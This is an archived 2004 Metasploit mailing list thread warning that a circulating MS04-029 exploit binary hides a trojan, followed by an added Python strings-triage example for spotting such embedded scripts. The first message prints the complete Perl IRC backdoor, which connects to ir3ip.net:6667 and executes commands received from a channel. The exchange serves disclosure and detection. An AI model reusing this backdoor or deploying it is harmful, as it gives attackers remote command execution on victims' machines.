Metasploit mailing list archives

MS04-029 Exploit = trojan!


From: alekc at avet.com.pl (Aleksander P. Czarnowski)
Date: Thu, 4 Nov 2004 00:34:45 +0100

The sad or funny part (depends on your sense of humor) is that even if you don't bother reading the exploit source code before 
running it you can still see the perl script with a simple strings command run against the binary. They could at least try to hide 
it a bit better on source code and binary level - after all tools like metasploit framework are used by people who can 
read assembly too ;-)
Just my 2 cents,
Aleksander Czarnowski
AVET INS
 
-----Original Message-----
From: Jerome ATHIAS [mailto:jerome.athias at caramail.com]
Sent: Wednesday, November 03, 2004 11:09 PM
To: framework 
Subject: [framework] MS04-029 Exploit = trojan!


#!/usr/bin/perl
$chan="#0x";$nick="k";$server="ir3ip.net";$SIG{TERM}={};exit
if fork;use 
IO::Socket;$sock = IO::Socket::INET->new($server.":6667")||exit;print

$sock "USER k +i k :kv1\nNICK k\n";$i=1;while(<$sock>=~/^[^
]+ ([^ ]+) 
/){$mode=$1;last if 
$mode=="001";if($mode=="433"){$i++;$nick=~s/\d*$/$i/;print
$sock "NICK 
$nick\n";}}print $sock "JOIN $chan\nPRIVMSG $chan 
:Hi\n";while(<$sock>){if (/^PING (.*)$/){print $sock "PONG
$1\nJOIN 
$chan\n";}if(s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* 
(.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split "\n"){print $sock "PRIVMSG

$chan :$_\n";sleep 1;}}}#/tmp/hi


Doh! bad shit yes
SORRY guys - too fast - too bad
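
The pre-run check described at the top of this thread (looking at a binary's strings before executing it), as an added example that is not part of the original messages: it extracts printable strings the way strings(1) does and flags the kinds of content visible in the quoted script. The indicator list and both sample byte strings are assumptions constructed for illustration.

```python
import re

# Assumed, non-exhaustive patterns a reviewer would look for in the strings
# of a file that claims to be a standalone exploit binary.
INDICATORS = {
    "embedded script shebang": re.compile(r"#!\s*/\S*(perl|python|sh|bash)\b"),
    "IRC client commands": re.compile(r"\b(PRIVMSG|NICK|JOIN) [#$\w]"),
    "IRC default port": re.compile(r":6667\b"),
    "Perl backtick execution": re.compile(r"=\s*`[^`]+`"),
}

def printable_strings(data: bytes, min_len: int = 4):
    """Like strings(1): runs of printable ASCII (plus tab) of min_len or more."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e\t]{%d,}" % min_len, data)]

def triage(data: bytes):
    """Return sorted (indicator, string) pairs found in the file's strings."""
    hits = set()
    for s in printable_strings(data):
        for name, rx in INDICATORS.items():
            if rx.search(s):
                hits.add((name, s))
    return sorted(hits)

# Constructed sample: a fake ELF header followed by inert fragments modelled
# on the script quoted in the thread (no server name, not a complete program).
SAMPLE_TROJANED = (
    b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 16
    + b"Usage: %s <target>\x00"
    + b"#!/usr/bin/perl\n"
    + b'$sock = IO::Socket::INET->new($server.":6667")||exit;\n'
    + b'print $sock "JOIN $chan\\nPRIVMSG $chan :Hi\\n";\n'
    + b"$_=`$_`;\x00\x01\x02"
)
# Constructed sample: the same header with only ordinary usage/error strings.
SAMPLE_CLEAN = (b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 16
                + b"Usage: %s <target>\x00connect failed\x00")

if __name__ == "__main__":
    for name, s in triage(SAMPLE_TROJANED):
        print(f"[!] {name}: {s}")
```

A clean result here only means none of these patterns appear in plain text; it does not show that a binary is safe to run.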

